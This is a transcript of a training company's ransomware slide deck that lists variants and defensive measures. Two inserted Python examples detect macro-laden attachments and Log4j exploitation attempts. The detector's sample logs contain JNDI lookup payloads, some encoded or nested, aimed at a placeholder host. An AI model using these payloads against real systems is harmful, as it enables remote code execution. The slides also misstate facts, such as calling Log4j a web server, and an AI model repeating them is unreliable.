Ransomware- A Reality Check (Part 2) - PowerPoint PPT Presentation

About This Presentation
Title:

Ransomware- A Reality Check (Part 2)

Description:

Ransomware has been the most significant threat for years; it has affected many sectors and remains one of the top risks. The topics covered in the webinar are detailed in this blog for reference.

Number of Views:37
Slides: 17
Provided by: infosectrain

Transcript and Presenter's Notes

Title: Ransomware- A Reality Check (Part 2)


1
Ransomware- A Reality Check (Part 2)
www.infosectrain.com sales_at_infosectrain.com
3
  • Ransomware- A reality check (Part 1)
  • Ransomware- A reality check (Part 2)
  • Ransomware- A reality check (Part 3)

4
Variants of Ransomware
  • Bad Rabbit: It was distributed by a fake Adobe Flash update on a corrupt website. Once the fake Adobe Flash update is downloaded, your data has been compromised.
  • CryptoWall: The malware hides in zip files and other email attachments, and then makes its way to your devices. Once you install them, it tries to find Java vulnerabilities to encrypt or withhold your data.
  • Petya: It is a crypto-ransomware that targets your Windows servers, laptops, or PCs. It mostly takes advantage of SMB (Server Message Block) and tries to steal your credentials and spread into your machine.
  • WannaCry: It was first seen in a large-scale crypto-ransomware attack in 2017. It affected almost a quarter-million machines internationally, and it spreads through your Windows operating system.
  • BlackByte: It is a notorious variant that compromised multiple US and foreign businesses, including three critical US infrastructure sectors. It encrypts your files and compromises the Windows host system, including physical and virtual servers.
5
Countermeasures
The following are the countermeasures or defense mechanisms to be implemented to ensure safe data transfer:
6
Using Firewall to its fullest capability
Firewalls are the most reliable. If a firewall does not allow a malicious web request, or an email security gateway has been implemented, then the users will not get any malicious attacks or emails. But if the firewall fails, there should be backup plans.

Log4j attack
The Log4j vulnerability, an Apache web server, has been exploited in the wild through games, moving from exploiting the game servers to the actual corporate servers.

User Education
For example, if an email passes through an email security gateway and firewall, and the user is unaware of potential phishing emails, it expands the attack surface. Kevin Mitnick, the most notorious hacker, started by phishing over the telephone, and the FBI searched for him a lot. There is training from a company called KnowBe4 that makes the user aware of phishing and how to identify emails received from an unsuspected user.
7
Disabling Macros execution
The execution of macros is a popular way in which people get exploited. For example, a malicious document is attached to an email, and the user who receives it is unaware of this and thinks it is legitimate. He then opens the document, and therefore the macros get enabled in the organization if he uses the organization network. Macros are small code blocks that get executed automatically in the background, primarily when an Office application is based on Visual Basic. These codes are written to exploit any existing vulnerabilities in the computers.
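
Before such a document reaches the user, an email security gateway can check whether an attachment carries macros by looking at its content rather than its file extension. This is an added example, not from the presentation; the sample files are built in memory, and the function names and the quarantine policy are assumptions.

```python
import io
import zipfile

# Magic bytes of the legacy OLE container used by .doc/.xls/.ppt files.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def classify_attachment(data: bytes) -> str:
    """Return 'macro', 'legacy-ole', 'clean-ooxml' or 'not-office'."""
    if data.startswith(OLE_MAGIC):
        # Legacy files can hold VBA; deciding needs an OLE parser, so flag them.
        return "legacy-ole"
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return "not-office"
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        names = archive.namelist()
        if "[Content_Types].xml" not in names:
            return "not-office"  # a zip, but not an Office Open XML package
        types = archive.read("[Content_Types].xml").decode("utf-8", "replace")
    # Macro-enabled packages store the VBA project as <app>/vbaProject.bin and
    # declare a macroEnabled / vbaProject content type.
    has_vba_part = any(n.lower().endswith("vbaproject.bin") for n in names)
    if has_vba_part or "macroEnabled" in types or "vbaProject" in types:
        return "macro"
    return "clean-ooxml"


def gateway_decision(filename: str, data: bytes) -> str:
    """Assumed policy: hold anything that may run macros, whatever it is named."""
    verdict = classify_attachment(data)
    return "quarantine" if verdict in ("macro", "legacy-ole") else "deliver"


def build_sample(with_macro: bool) -> bytes:
    """Constructed OOXML-shaped archive; the VBA part is placeholder bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", "<document/>")
        if with_macro:
            archive.writestr("word/vbaProject.bin", b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    # A macro-bearing file named .docx is still caught, because content is checked.
    print(gateway_decision("invoice.docx", build_sample(with_macro=True)))
    print(gateway_decision("notes.docx", build_sample(with_macro=False)))
```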




8
Implement Web security
The cross-site scripting attack: suppose your browser is vulnerable to a particular attack. These types of browser vulnerabilities are exploited by visiting a malicious website. There's a well-known chef, Jamie Oliver, whose website was vulnerable, and everyone visiting his website downloaded the malicious code in the background. To overcome such malicious code, every organization should implement WAF rules and disable adblock.
9
Incorporate least privilege policy
Rule-based access control and our backup is most important. Giving people privileged access only to perform the activity, not full access, is part of a defense-in-depth strategy.

Network Segmentation
The HR department receives more external emails, documents, or PDF files than the software development department. Do you think both teams should work on the same network to implement high security? If HR receives a malicious email and clicks, the malware starts spreading in the environment. For example, Wipro was part of the MSSP attack. A supply chain attack took place because some other team had clicked some URL that led people to come into the network. If they had segmented their network, they would have prevented it.
10
Active monitoring
Security analysts in the Security Operation Center (SOC) monitor alerts 24/7. They look to modify and identify the attacks. For example, when they figured out that log4j was being exploited, with 3000 log4j attempts, they implemented alerts and security measures to block the attempts and notify us. That helps to take further steps and investigate that particular source or IP address.

Action Plan
It's not about how you will be attacked; it's about when you will be attacked. Even organizations with high security are compromised, and an action plan helps in this case. A clear and detailed action plan of what to do and how to do it when an attack occurs includes the most practical and effective countermeasures to implement quickly.
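
The alerting described under Active monitoring, counting Log4j exploitation attempts per source so that the IP address can be blocked and investigated, could look like the following. This is an added example, not from the presentation; the log lines are constructed, and the function names and the threshold of 3 are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed access-log lines; addresses come from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET /?q=${jndi:ldap://x.example/a} HTTP/1.1" 404 153 "-" "curl/7.79"
203.0.113.7 - - [12/Dec/2021:10:01:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:dns://x.example}"
203.0.113.7 - - [12/Dec/2021:10:01:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fx.example%2Fa%7D HTTP/1.1" 404 153 "-" "curl/7.79"
198.51.100.20 - - [12/Dec/2021:10:02:00 +0000] "GET /s?x=${${lower:j}ndi:ldap://x.example/a} HTTP/1.1" 404 153 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Dec/2021:10:03:00 +0000] "GET /docs/jndi-overview.html HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

JNDI = re.compile(r"\$\{jndi:", re.I)
# Innermost ${lower:x}, ${upper:x} or ${name:-x} lookups, which resolve to x.
WRAPPER = re.compile(r"\$\{(?:(?:lower|upper):|[^{}$]*?:-)([^{}$]*)\}", re.I)


def is_jndi_attempt(line: str) -> bool:
    """True if the line holds a JNDI lookup, also when encoded or wrapped."""
    text = line
    for _ in range(3):  # undo up to three layers of URL encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(10):  # resolve nested wrapper lookups from the inside out
        if JNDI.search(text):
            return True
        collapsed = WRAPPER.sub(r"\1", text)
        if collapsed == text:
            return False
        text = collapsed
    return bool(JNDI.search(text))


def attempts_by_source(log_text: str) -> Counter:
    """Count matching lines per client IP (first field of each log line)."""
    counts = Counter()
    for line in log_text.splitlines():
        if line.strip() and is_jndi_attempt(line):
            counts[line.split(" ", 1)[0]] += 1
    return counts


def sources_to_block(log_text: str, threshold: int = 3) -> list:
    """IPs at or above the alert threshold, for blocking and investigation."""
    return sorted(ip for ip, n in attempts_by_source(log_text).items() if n >= threshold)


if __name__ == "__main__":
    print(attempts_by_source(SAMPLE_LOG), sources_to_block(SAMPLE_LOG))
```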




11
About InfosecTrain
  • Established in 2016, we are one of the finest
    Security and Technology Training and Consulting
    companies
  • Wide range of professional training programs,
    certifications and consulting services in the IT
    and Cyber Security domain
  • High-quality technical services, certifications
    or customized training programs curated with
    professionals of over 15 years of combined
    experience in the domain

12
Our Endorsements
13
Why InfosecTrain
Global Learning Partners
Access to the recorded sessions
Certified and Experienced Instructors
Flexible modes of Training
Tailor Made Training
Post training completion
14
Our Trusted Clients
15
(No Transcript)
16
Contact us
Get your workforce reskilled by our certified and
experienced instructors!
IND 1800-843-7890 (Toll Free) / US 1 657-221-1127 / UK 44 7451 208413
sales_at_infosectrain.com
www.infosectrain.com